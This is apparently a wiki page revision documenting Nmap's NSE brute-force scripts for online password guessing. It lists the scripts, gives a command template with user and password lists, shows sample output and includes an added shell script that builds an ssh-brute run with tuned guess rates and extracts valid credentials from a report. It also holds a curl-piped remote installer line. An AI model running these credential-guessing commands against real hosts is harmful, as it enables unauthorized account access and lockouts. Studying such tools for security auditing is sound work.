Difference between revisions of "Brute-Force with NMAP"
(JPDoe moved page Brute-Force with NMAP to Delete 1: No rights to delete) Tag: New redirect
(Removed redirect to Delete 1) Tag: Removed redirect
== Summary ==
Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing. Nmap can also be used for simple online password-guessing attacks by passing the '''--script''' parameter with the desired script, for example '''telnet-brute.nse''', together with the corresponding '''userdb''' and '''passdb''' values in the additional '''--script-args''' parameter. Every guess these scripts make is a real login attempt against the target, so expect account lockouts and authentication-failure alerts on the far side.
== Requirements ==
=== macOS ===
 # Homebrew: the missing package manager for macOS (or Linux)
 /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
 # nmap
 brew install nmap
The Ruby-based installer shown above has since been retired in favour of a Bash script in the same repository; check the current one-liner at https://brew.sh before running it, and read any script before piping it from the network into an interpreter.
----
=== Linux ===
 # CentOS
 yum install nmap
 # Debian
 apt-get install nmap
 # Ubuntu
 sudo apt install nmap
Distribution packages can lag well behind the upstream release, so a script that appears in the nmap repository may be missing from the locally installed scripts directory.
== Description ==
The Nmap Scripting Engine (NSE) allows users to write and share simple scripts in the Lua programming language to automate a wide variety of networking tasks. Scripts are executed in parallel with the speed and efficiency expected from Nmap, and NSE can even be used for vulnerability exploitation. The currently defined [https://nmap.org/book/nse-usage.html#nse-categories categories] are '''auth''', '''broadcast''', '''brute''', '''default''', '''discovery''', '''dos''', '''exploit''', '''external''', '''fuzzer''', '''intrusive''', '''malware''', '''safe''', '''version''', and '''vuln'''. Password-guessing scripts belong to the '''brute''' category (and, because they generate real failed logins, usually '''intrusive''' as well). The credential-guessing scripts share the '''brute''' library for scheduling guesses and the '''unpwdb''' library for reading the '''userdb''' and '''passdb''' word lists, so the same arguments work for ssh-brute, ftp-brute, telnet-brute and the other credential-guessing scripts.
List all available nmap brute-force scripts online (''70 results, 28 November 2019''):
 curl https://svn.nmap.org/nmap/scripts/ 2>/dev/null | grep brute | cut -d '"' -f2 | sort
 afp-brute.nse
 ajp-brute.nse
 backorifice-brute.nse
 cassandra-brute.nse
 cics-user-brute.nse
 citrix-brute-xml.nse
 cvs-brute-repository.nse
 cvs-brute.nse
 deluge-rpc-brute.nse
 dicom-brute.nse
 dns-brute.nse
 domcon-brute.nse
 dpap-brute.nse
 drda-brute.nse
 ftp-brute.nse
 http-brute.nse
 http-form-brute.nse
 http-iis-short-name-brute.nse
 http-joomla-brute.nse
 http-proxy-brute.nse
 http-wordpress-brute.nse
 iax2-brute.nse
 imap-brute.nse
 informix-brute.nse
 ipmi-brute.nse
 irc-brute.nse
 irc-sasl-brute.nse
 iscsi-brute.nse
 ldap-brute.nse
 membase-brute.nse
 metasploit-msgrpc-brute.nse
 metasploit-xmlrpc-brute.nse
 mikrotik-routeros-brute.nse
 mmouse-brute.nse
 mongodb-brute.nse
 ms-sql-brute.nse
 mysql-brute.nse
 nessus-brute.nse
 nessus-xmlrpc-brute.nse
 netbus-brute.nse
 nexpose-brute.nse
 nje-node-brute.nse
 nje-pass-brute.nse
 nping-brute.nse
 omp2-brute.nse
 openvas-otp-brute.nse
 oracle-brute-stealth.nse
 oracle-brute.nse
 oracle-sid-brute.nse
 pcanywhere-brute.nse
 pgsql-brute.nse
 pop3-brute.nse
 redis-brute.nse
 rexec-brute.nse
 rlogin-brute.nse
 rpcap-brute.nse
 rsync-brute.nse
 rtsp-url-brute.nse
 sip-brute.nse
 smb-brute.nse
 smtp-brute.nse
 snmp-brute.nse
 socks-brute.nse
 ssh-brute.nse
 svn-brute.nse
 telnet-brute.nse
 tso-brute.nse
 vmauthd-brute.nse
 vnc-brute.nse
 xmpp-brute.nse
The filter matches on file name only. Several of the hits enumerate names rather than credentials and take their own arguments instead of '''userdb''' and '''passdb''', for example '''dns-brute.nse''' (host names), '''oracle-sid-brute.nse''' (Oracle SIDs), '''rtsp-url-brute.nse''' (stream URLs) and '''http-iis-short-name-brute.nse''' (8.3 file names).
Download the SSH brute-force script (useful when the installed nmap predates it):
 wget https://svn.nmap.org/nmap/scripts/ssh-brute.nse
'''--script''' accepts a file path, so the downloaded script can be referenced directly; if it is copied into nmap's scripts directory instead, run '''nmap --script-updatedb''' so that the new file is indexed. A script fetched from the repository may rely on NSE library functions that an older installed nmap does not yet ship.
Example usage and results. The '''.nse''' extension can be omitted when naming a script. Note that '''-A''' is not a timing option: it enables OS detection, version detection, the default script set and traceroute, which is more than a brute-force run needs, so '''-sV''' or no extra scan option is usually sufficient. Scan aggressiveness is set with the '''-T0''' to '''-T5''' timing templates, while the rate of login guesses is governed by the script arguments '''brute.threads''' and '''brute.delay'''; '''brute.firstonly''' stops after the first valid account and '''brute.mode''' (''user'', ''pass'' or ''creds'') selects how the two lists are combined.
 nmap -p '''$PORT''' -A --script '''$SCRIPT''' --script-args userdb='''$USER_LIST''',passdb='''$PASS_LIST''' '''$TARGET'''
Expected output as documented in the header of '''ssh-brute.nse''':
 -- @output
 -- 22/ssh open ssh
 -- | ssh-brute:
 -- |  Accounts
 -- |    username:password
 -- |  Statistics
 -- |_   Performed 32 guesses in 25 seconds.
 --
 -- @args ssh-brute.timeout Connection timeout (default: "5s")
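The following POSIX shell script is an added example and is not code from the original page or from the Nmap project. It writes two small constructed word lists in the format '''unpwdb''' reads, assembles the nmap command line with explicit '''brute.threads''' and '''brute.delay''' tuning and a '''-oN''' report file, and then extracts the accounts the '''brute''' library reported as valid from such a report. The report it parses is constructed, not captured from a real host (the target 192.0.2.10 is a documentation address), and the "user:pass - Valid credentials" line layout is assumed to be the one current nmap releases print; nmap itself is only executed when RUN_NMAP=1 is set.

```shell
#!/bin/sh
# Added example, not code from the original page or from the Nmap project.
# Builds an nmap brute-force invocation with explicit brute/unpwdb tuning,
# writes constructed word lists, and pulls valid credentials out of a
# normal-format (-oN) report afterwards.
# Assumption: found accounts appear as "user:pass - Valid credentials" under
# "Accounts:", the brute library's table layout in current nmap releases.

# Write constructed user and password lists in unpwdb format: one entry per
# line, lines beginning with # are ignored by the library.
write_wordlists() {
    printf '# constructed sample users\nroot\nadmin\ndeploy\n' > "$1"
    printf '# constructed sample passwords\ntoor\nadmin\ndeploy123\n' > "$2"
}

# Print the nmap command line for one credential brute-force run.
# -Pn -n skip host discovery and DNS; brute.threads=4 and brute.delay=1
# (one second between guesses) keep the guess rate low enough to avoid
# tripping most lockout policies on a single account.
# Arguments: target port script userlist passlist report
build_brute_cmd() {
    printf 'nmap -Pn -n -p %s --script %s --script-args userdb=%s,passdb=%s,brute.threads=4,brute.delay=1 -oN %s %s\n' \
        "$2" "$3" "$4" "$5" "$6" "$1"
}

# Print every "user:pass" the brute library reported as valid in a -oN report.
extract_valid_creds() {
    sed -n 's/^|[ _]*\([^ ][^ ]*\) - Valid credentials.*$/\1/p' "$1"
}

# Print the number of guesses from the Statistics line (empty if absent).
guess_count() {
    sed -n 's/^|[ _]*Statistics: Performed \([0-9][0-9]*\) guesses.*$/\1/p' "$1"
}

# Constructed report (not captured from a real host) in the layout nmap
# writes with -oN when ssh-brute finds two accounts.
SAMPLE_REPORT=$(mktemp)
cat > "$SAMPLE_REPORT" <<'EOF'
# Nmap 7.80 scan initiated Thu Nov 28 10:00:00 2019 as: nmap -Pn -n -p 22 --script ssh-brute -oN ssh-brute.txt 192.0.2.10
Nmap scan report for 192.0.2.10
Host is up (0.0010s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-brute:
|   Accounts:
|     root:toor - Valid credentials
|     deploy:deploy123 - Valid credentials
|_  Statistics: Performed 12 guesses in 9 seconds, average tps: 1.3
EOF

WORK=$(mktemp -d)
write_wordlists "$WORK/users.lst" "$WORK/pass.lst"
CMD=$(build_brute_cmd 192.0.2.10 22 ssh-brute "$WORK/users.lst" "$WORK/pass.lst" "$WORK/ssh-brute.txt")
echo "would run: $CMD"
# Set RUN_NMAP=1 to actually execute the command against a host you control.
if [ "${RUN_NMAP:-0}" = 1 ]; then eval "$CMD"; fi

echo "valid credentials in sample report:"
extract_valid_creds "$SAMPLE_REPORT"
echo "guesses performed: $(guess_count "$SAMPLE_REPORT")"
```

After a real run, point extract_valid_creds at the '''-oN''' file named in the command; credentials containing spaces would need a different separator than the one the sed pattern assumes.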
== Additional Information ==
=== macOS ===
Default user and password lists shipped with nmap (the files are named '''usernames.lst''' and '''passwords.lst'''; there is no user.lst or pass.lst):
 /usr/local/Cellar/nmap/'''$NMAP_VERSION'''/share/nmap/nselib/data/usernames.lst
 /usr/local/Cellar/nmap/'''$NMAP_VERSION'''/share/nmap/nselib/data/passwords.lst
View available scripts:
 ls -al /usr/local/Cellar/nmap/'''$NMAP_VERSION'''/share/nmap/scripts/
On Apple silicon Homebrew installs under /opt/homebrew rather than /usr/local; '''brew --prefix nmap''' prints the correct prefix on either architecture.
----
=== Linux ===
Default nmap home:
 /usr/share/nmap/
Find all available nmap scripts, if any (quote the pattern so the shell does not expand it against the current directory first):
 find / -name '*.nse' 2>/dev/null
Find the default nmap files, if any:
 find / -type f \( -name "ssh-brute.nse" -o -name "passwords.lst" -o -name "usernames.lst" \) 2>/dev/null
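As an added example that is not part of the original page or of the Nmap project, the script below locates nmap's '''script.db''' index in the usual install locations and lists scripts by their declared category rather than by matching "brute" in the file name, which is what separates real credential guessers from scripts that merely carry "brute" in their name. The entry layout it parses is assumed to be the one '''nmap --script-updatedb''' writes; the bundled sample index is constructed and is used only when no installed index is found.

```shell
#!/bin/sh
# Added example, not code from the original page or from the Nmap project.
# Lists NSE scripts by category from nmap's script.db index instead of
# matching "brute" in file names, and looks for the index where Linux
# packages, /usr/local builds and Homebrew put it.
# Assumption: script.db lines have the form
#   Entry { filename = "ssh-brute.nse", categories = { "brute", "intrusive", } }
# as written by nmap --script-updatedb.

# Print the first script.db found in the common nmap data directories;
# return 1 (printing nothing) if none exists.
find_script_db() {
    brew_prefix=$(brew --prefix nmap 2>/dev/null || true)
    for dir in /usr/share/nmap /usr/local/share/nmap "$brew_prefix/share/nmap"; do
        if [ -f "$dir/scripts/script.db" ]; then
            echo "$dir/scripts/script.db"
            return 0
        fi
    done
    return 1
}

# Print the file names of every script.db entry whose categories include $2.
# The category match is restricted to the categories = { ... } part so a
# file name such as dns-brute.nse cannot satisfy a search for "brute".
scripts_in_category() {
    sed -n "/categories = {[^}]*\"$2\"/ s/.*filename = \"\([^\"]*\)\".*/\1/p" "$1" | sort
}

# Constructed sample index (five entries) used when no real script.db exists.
SAMPLE_DB=$(mktemp)
cat > "$SAMPLE_DB" <<'EOF'
Entry { filename = "dns-brute.nse", categories = { "intrusive", "discovery", } }
Entry { filename = "ftp-anon.nse", categories = { "default", "auth", "safe", } }
Entry { filename = "ssh-brute.nse", categories = { "brute", "intrusive", } }
Entry { filename = "ssh-hostkey.nse", categories = { "safe", "default", "discovery", } }
Entry { filename = "telnet-brute.nse", categories = { "brute", "intrusive", } }
EOF

DB=$(find_script_db || true)
if [ -n "$DB" ]; then
    echo "using installed index: $DB"
else
    echo "no installed script.db found; using constructed sample"
    DB=$SAMPLE_DB
fi
echo "scripts in category brute:"
scripts_in_category "$DB" brute
```

With a real index in place, '''nmap --script-help brute''' prints the documentation of every script the same query lists, including the arguments each one accepts.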
== Used Hardware ==
[[MacBook Pro (15-inch, 2017), macOS 10.14, 2,8GHz Intel Core i7, 16GB LPDDR3]]
== References ==
* https://brew.sh
* https://www.lua.org/
* https://nmap.org/nsedoc/scripts/
* https://nmap.org/nsedoc/scripts/ssh-brute.html
* https://nmap.org/nsedoc/lib/unpwdb.html#script-args
* https://nmap.org/book/nse-usage.html#nse-categories
* https://nmap.org/book/man-nse.html
* https://svn.nmap.org/nmap/scripts/
[[Category:Documentation]]
Revision as of 12:03, 6 February 2020